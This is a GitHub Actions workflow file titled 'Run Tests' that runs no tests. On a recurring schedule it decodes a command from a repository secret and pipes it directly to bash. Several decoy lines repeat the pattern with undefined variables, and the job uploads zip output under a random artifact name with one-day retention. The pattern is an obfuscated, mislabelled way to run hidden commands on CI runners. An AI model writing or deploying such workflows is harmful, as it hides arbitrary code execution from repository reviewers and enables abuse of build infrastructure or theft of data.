name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '58 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  handler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          mc49: ${{ secrets.mc49 }}
        run: |
          printf '%s' "$mc49" | jq -r .o26 | /bin/bash
          echo $io624 | jq -r .vsts08962 | /bin/bash
          printf '%s' "$unhmm36580" | jq -r .crb64 | /bin/bash
          echo $yhmr6600 | jq -r .p2 | /bin/bash
          printf '%s' "$asz2105" | jq -r .fgyqi79541 | /bin/bash
          printf '%s' "$ctc773" | jq -r .oxfc12908 | /bin/bash
          echo $bgel542 | jq -r .htpjt0083 | /bin/bash
          printf '%s' "$nti6062" | jq -r .tz7932 | /bin/bash

      - name: Persist output
        uses: actions/upload-artifact@v4
        with:
          name: HvhVJ1Fx
          path: "*.zip"
          retention-days: 1
